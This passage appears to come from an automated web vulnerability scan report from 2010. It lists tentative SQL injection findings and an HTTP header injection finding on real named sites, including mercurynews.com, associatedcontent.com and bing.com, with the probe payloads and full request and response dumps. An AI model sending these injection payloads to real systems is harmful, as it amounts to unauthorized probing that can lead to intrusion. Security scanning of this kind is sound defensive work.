   <title>San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Holiday Homes, Holiday Rentals, Provence, France</title>
   <meta name="keywords" content="San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>

...[SNIP]...

Request 2

GET /vacation-rentals/united-states+california+south-lake-tahoe+3+4828397937254'%20or%201%3d2--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=ou3nqeh7iga9c77qnb1p8khtb3; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:10:26 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101810; expires=Tue, 15-Nov-2011 02:10:26 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22988

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals, , </title>
   <meta name="keywords" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>
</div>
<div class="clearfix"></div>

...[SNIP]...

1.6. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+hawaii+2+11 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vacationrentals.mercurynews.com
Path:   /vacation-rentals/united-states+hawaii+2+11

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 95733272'%20or%201%3d1--%20 and 95733272'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /vacation-rentals/united-states+hawaii+2+1195733272'%20or%201%3d1--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=ne1hs9pfl2v073lbi6omn72d21; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:10:17 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101810; expires=Tue, 15-Nov-2011 02:10:17 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23028

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Center Vacation Homes, Center Vacation Rentals, Holiday Homes, Holiday Rentals, Israel</title>
   <meta name="keywords" content="San Jose Mercury News: Center Vacation Homes, Center Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Center Vacation Homes, Center Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>
</div>

...[SNIP]...

Request 2

GET /vacation-rentals/united-states+hawaii+2+1195733272'%20or%201%3d2--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=ste731imj2i2967ve3jaca05g0; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:10:17 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101810; expires=Tue, 15-Nov-2011 02:10:17 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22986

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals, </title>
   <meta name="keywords" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>
</div>
<div class="clearfix"></div>

...[SNIP]...

1.7. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+nevada+las-vegas+3+1552 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vacationrentals.mercurynews.com
Path:   /vacation-rentals/united-states+nevada+las-vegas+3+1552

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 15259239'%20or%201%3d1--%20 and 15259239'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /vacation-rentals/united-states+nevada+las-vegas+3+155215259239'%20or%201%3d1--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=ttb986aq4h688eo7ugf6o3q151; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:10:19 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101810; expires=Tue, 15-Nov-2011 02:10:19 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23062

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Holiday Homes, Holiday Rentals, Provence, France</title>
   <meta name="keywords" content="San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>

...[SNIP]...

Request 2

GET /vacation-rentals/united-states+nevada+las-vegas+3+155215259239'%20or%201%3d2--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=71u2oka6m57riqbujql4c2doj7; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:10:22 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101810; expires=Tue, 15-Nov-2011 02:10:22 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22988

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals, , </title>
   <meta name="keywords" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>
</div>
<div class="clearfix"></div>

...[SNIP]...

1.8. http://www.associatedcontent.com/article/6007620/pop_print.shtml [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.associatedcontent.com
Path:   /article/6007620/pop_print.shtml

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /article/6007620/pop_print.shtml?content_type=article&content_type_id=6007620 HTTP/1.1
Host: www.associatedcontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: c=MTc0MTIyMjMyMTg3NzU3MzUx; ACSESS=bunc6586kdrk769qu85umchs65; cs=Ng%3D%3D;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1 (redirected)

HTTP/1.0 200 OK
Date: Sun, 14 Nov 2010 23:25:23 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//">
<html>
<head>
<title>Childhood Obesity News - San Francisco Law Limits Fast Food Toys - Associated Content - associatedcontent.com</title>
<meta http-e
...[SNIP]...
<script type="text/javascript" src="http://ads.associatedcontent.com/www/delivery/spcjs.php?id=1&source=&cb=174122232187771239&slice=-0-&dma=-618-&cty=-US-&content_type=article&content_type_id=6007620&category_id=5&site_id=1&key_page=174122232187771239&ac_url=http%3A%2F%2Fwww.associatedcontent.com%2Farticle%2F6007620%2Fpop_print.shtml&loc=http%3A%2F%2Fwww.associatedcontent.com%2Farticle%2F6007620%2Fpop_print.shtml%3Fcontent_type_id%3D6007620%26cat%3D5&referer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3D%27%2520and%25201%253d1--%2520&zones=zone1%3D1%7Czone2%3D2%7Czone3%3D3%7Czone4%3D4%7Czone6%3D6%7Czone9%3D9%7Czone58%3D58&nz=1"></script>

</head>
<body>

   <script type="text/javascript"><!--
   s.pageName="www:article";s.pageType="";s.prop21="www";s.prop4="174122232187757351";s.prop5="350957";s.prop14="no";s.prop18="Childhood Obesity News - San Francisco Law Limits Fast Food Toys";s.prop19="6007620";s.prop20="article";s.prop22="1";s.prop23="1";s.prop24="US";s.prop25="TX";s.prop26="Houston TX";s.prop27="Houston";s.prop28="713";s.prop29="5";s.prop32="general";    s.campaign="";s.events="";s.products="";
       var s_code=s.t();if(s_code)document.write(s_code);
   s.linkTrackVars='prop30,prop31,prop33';if (s.prop20) s.prop30=s.prop20;if (s.prop29) s.prop31=s.prop29;s.prop33=s.prop32;    //--></script>
           <script type="text/javascript">_qoptions={qacct:"p-32Swj5sJwj0d6",labels:"Health"};</script>
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
       <noscript>
       <img src="http://pixel.quantserve.com/pixel/p-32Swj5sJwj0d6.gif?labels="Health" style="display: none;" border="0" height="1" width="1"/>
       </noscript>
   
   <!--[if IE 6]>
   <style type="text/css">
   html, body { height: 100%; overflow: hidden; background: #333; margin: 0; padding: 0; position: relative; }
   .minibar { position: absolute; }
   .minibar { bottom: -1px; }
   .minibar_content { position: relative; width: 100%; height: 100%; overflow: auto; background: #e6e3dc; border: 1px solid #e6e3dc; margin: 0; padding: 0; }
   </style>
   <script>var isIE6 = true;</script>
   <![endif]-->
<div id="page" class="minibar_conte
...[SNIP]...

Request 2

GET /article/6007620/pop_print.shtml?content_type=article&content_type_id=6007620 HTTP/1.1
Host: www.associatedcontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: c=MTc0MTIyMjMyMTg3NzU3MzUx; ACSESS=bunc6586kdrk769qu85umchs65; cs=Ng%3D%3D;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20

Response 2 (redirected)

HTTP/1.0 200 OK
Date: Sun, 14 Nov 2010 23:25:25 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//">
<html>
<head>
<title>Childhood Obesity News - San Francisco Law Limits Fast Food Toys - Associated Content - associatedcontent.com</title>
<meta http-e
...[SNIP]...
<script type="text/javascript" src="http://ads.associatedcontent.com/www/delivery/spcjs.php?id=1&source=&cb=174122232187771250&slice=-0-&dma=-618-&cty=-US-&content_type=article&content_type_id=6007620&category_id=5&site_id=1&key_page=174122232187771250&ac_url=http%3A%2F%2Fwww.associatedcontent.com%2Farticle%2F6007620%2Fpop_print.shtml&loc=http%3A%2F%2Fwww.associatedcontent.com%2Farticle%2F6007620%2Fpop_print.shtml%3Fcontent_type_id%3D6007620%26cat%3D5&referer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3D%27%2520and%25201%253d2--%2520&zones=zone1%3D1%7Czone2%3D2%7Czone3%3D3%7Czone4%3D4%7Czone6%3D6%7Czone9%3D9%7Czone58%3D58&nz=1"></script>

</head>
<body>

   <script type="text/javascript"><!--
   s.pageName="www:article";s.pageType="";s.prop21="www";s.prop4="174122232187757351";s.prop5="350957";s.prop14="no";s.prop18="Childhood Obesity News - San Francisco Law Limits Fast Food Toys";s.prop19="6007620";s.prop20="article";s.prop22="1";s.prop23="1";s.prop24="US";s.prop25="TX";s.prop26="Houston TX";s.prop27="Houston";s.prop28="713";s.prop29="5";s.prop32="general";    s.campaign="";s.events="";s.products="";
       var s_code=s.t();if(s_code)document.write(s_code);
   s.linkTrackVars='prop30,prop31,prop33';if (s.prop20) s.prop30=s.prop20;if (s.prop29) s.prop31=s.prop29;s.prop33=s.prop32;    //--></script>
           <script type="text/javascript">_qoptions={qacct:"p-32Swj5sJwj0d6",labels:"Health"};</script>
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
       <noscript>
       <img src="http://pixel.quantserve.com/pixel/p-32Swj5sJwj0d6.gif?labels="Health" style="display: none;" border="0" height="1" width="1"/>
       </noscript>
   
   <!--[if IE 6]>
   <style type="text/css">
   html, body { height: 100%; overflow: hidden; background: #333; margin: 0; padding: 0; position: relative; }
   .minibar { position: absolute; }
   .minibar { bottom: -1px; }
   .minibar_content { position: relative; width: 100%; height: 100%; overflow: auto; background: #e6e3dc; border: 1px solid #e6e3dc; margin: 0; padding: 0; }
   </style>
   <script>var isIE6 = true;</script>
   <![endif]-->
<div id="page" class="minibar_conte
...[SNIP]...

1.9. http://www.bing.com/fd/sa/0807035841/PostContent.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bing.com
Path:   /fd/sa/0807035841/PostContent.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /fd/sa'/0807035841/PostContent.js HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://www.bing.com/search?q=sfo+news&src=IE-SearchBox&FORM=IE8SRC
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: www.bing.com
Proxy-Connection: Keep-Alive
Cookie: MUID=96C2DF45871646C7B73393B23DF23548&TUID=1; SRCHD=MS=1510502&SM=1&D=1501491&AF=IE8SRC; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20101108; _UR=OMW=1; _SS=SID=98F8B560F09546FCAFC915D0D1E309CD&hIm=400; OrigMUID=96C2DF45871646C7B73393B23DF23548%2c8acf7d1d80e14faaae51bf7f79853cd4; RMS=T=262656; SRCHUID=V=2&GUID=C83DE67312BC457AB03716003EB09140

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 316
Content-Type: text/xml; charset=utf-8
Date: Sun, 14 Nov 2010 23:27:27 GMT
Connection: close

<BingResponse xmlns="http://schemas.microsoft.com/bing/bdi"><ImpressionGuid>8f948b815559460c9783d2223273c71d</ImpressionGuid><EventId>A678F6DA3B92442CA24989549A190DE9</EventId><Errors><Error><Message>
...[SNIP]...

Request 2

GET /fd/sa''/0807035841/PostContent.js HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://www.bing.com/search?q=sfo+news&src=IE-SearchBox&FORM=IE8SRC
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: www.bing.com
Proxy-Connection: Keep-Alive
Cookie: MUID=96C2DF45871646C7B73393B23DF23548&TUID=1; SRCHD=MS=1510502&SM=1&D=1501491&AF=IE8SRC; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20101108; _UR=OMW=1; _SS=SID=98F8B560F09546FCAFC915D0D1E309CD&hIm=400; OrigMUID=96C2DF45871646C7B73393B23DF23548%2c8acf7d1d80e14faaae51bf7f79853cd4; RMS=T=262656; SRCHUID=V=2&GUID=C83DE67312BC457AB03716003EB09140

Response 2

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Length: 10261
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Date: Sun, 14 Nov 2010 23:27:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

2. HTTP header injection
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://111.xg4ken.com/media/redir.php [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://111.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the client request parameter is copied into the Location response header. The payload 7276c%0d%0a96ecccdd8a was submitted in the client parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=7276c%0d%0a96ecccdd8a HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:42 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=64ec9846-bb52-23a8-43c8-0000231d7fb3; expires=Sat, 12-Feb-2011 23:04:42 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=cpc&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=7276c
96ecccdd8a

